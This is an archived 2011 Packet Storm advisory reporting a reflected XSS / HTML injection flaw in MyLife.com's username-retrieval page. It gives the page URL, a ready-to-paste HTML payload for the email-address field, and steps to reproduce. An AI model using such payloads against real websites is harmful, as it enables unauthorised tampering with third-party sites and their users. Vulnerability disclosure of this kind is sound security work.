MyLife HTML Injection

2011-07-21T00:00:00
ID PACKETSTORM:103222
Type packetstorm
Reporter r007k17-w
Modified 2011-07-21T00:00:00

Description

                                        
                                            ` %+  
$.......#........4.........|)........0............\/\/ %+  
  
%+  
%+  
  
%+++++++++++++++++++++++++++++  
+++++++++++  
  
  
# Exploit Title :Mylife reflected XSS vulnerability  
# Vendor: www.mylife.com  
# Author: $#4d0\/\/[r007k17] a.k.a Raghavendra Karthik D  
# Blog: http://shadowrootkit.wordpress.com/  
# Google Dork: Copyright © 2011 MyLife.com  
  
**********************************************************************************************************************************************************  
BREIF DESCRIPTION  
*****************************  
Reflected XSS bug in 13th best Social  
Networking site in the world.  
  
************************************************************  
************************************************************  
**********************************  
  
Reflected XSS Vulnerability  
********************************  
{DEMO}:  
http://www.mylife.com/retrieveUsername.pub  
  
  
  
  
EXPLOIT: "><marquee><h1><a href="http://www.xssed.com  
">r007k17</a></h1></marquee>  
  
Procedure: open the link given above. Inject above script in email-address.  
Observe a link based text in motion(r007k17)  
  
  
***************************************************************************************************************************************************************  
sp3c14l Thanks to my sw337 bro s1d3 effects and my friends@!3.14--  
***************************************************************************************************************************************************************  
`